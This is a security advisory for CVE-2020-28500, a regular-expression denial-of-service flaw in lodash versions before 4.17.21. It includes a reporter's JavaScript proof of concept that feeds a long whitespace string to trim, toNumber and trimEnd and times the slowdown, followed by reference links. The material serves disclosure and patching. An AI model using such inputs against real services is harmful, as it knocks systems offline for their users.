MEDIUM 5.3 npm
Regular Expression Denial of Service (ReDoS) in lodash
GHSA-29mw-wpgm-hmr9 · CVE-2020-28500
Published · Modified
Description
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.
Steps to reproduce (provided by reporter Liyuan Chen):
var lo = require('lodash');
function build_blank(n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var s = build_blank(50000) var time0 = Date.now();
lo.trim(s)
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);
var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
References
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2020-28500
- WEB https://github.com/github/advisory-database/pull/6139
- WEB https://github.com/lodash/lodash/pull/5065
- WEB https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
- WEB https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
- WEB https://www.oracle.com/security-alerts/cpuoct2021.html
- WEB https://www.oracle.com/security-alerts/cpujul2022.html
- WEB https://www.oracle.com/security-alerts/cpujan2022.html
- WEB https://www.oracle.com//security-alerts/cpujul2021.html
- WEB https://snyk.io/vuln/SNYK-JS-LODASH-1018905
- WEB https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
- WEB https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
- WEB https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
- WEB https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
- WEB https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
- WEB https://security.netapp.com/advisory/ntap-20210312-0006
- WEB https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml
- WEB https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8
- PACKAGE https://github.com/lodash/lodash
- WEB https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
Ready to move
Start Securing
Free, no credit card | First findings in minutes